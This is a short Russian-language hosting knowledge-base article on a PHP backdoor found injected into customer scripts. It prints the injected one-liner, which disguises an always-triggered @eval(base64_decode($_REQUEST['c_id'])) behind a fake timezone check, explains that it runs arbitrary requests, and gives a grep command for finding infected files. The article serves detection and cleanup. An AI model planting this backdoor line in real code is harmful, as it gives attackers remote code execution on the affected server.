База знаний
DOS Bank Of Amerika
Отправлено Алексей Шпак в 17 April 2013 11:24 AM

В пользовательские PHP-скрипты вставляется код следующего вида:

 

function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));

Основной вредонос заключается в записи:

@eval(base64_decode($_REQUEST['c_id']))

т.е. через данный скрипт можно передать любой POST-запрос

 

Такие скрипты необходимо удалять из файлов

чтобы найти файлы, содержащие такой скрипт можно ввести команду:

grep -rhlie "\@eval(base64_decode(\$_REQUEST\['c_id'\]));" *

 

(2 голосов)
Эта статья оказалась полезной
Эта статья не оказалась полезной

Комментарии (0)
© ЦОД РУП "Белтелеком"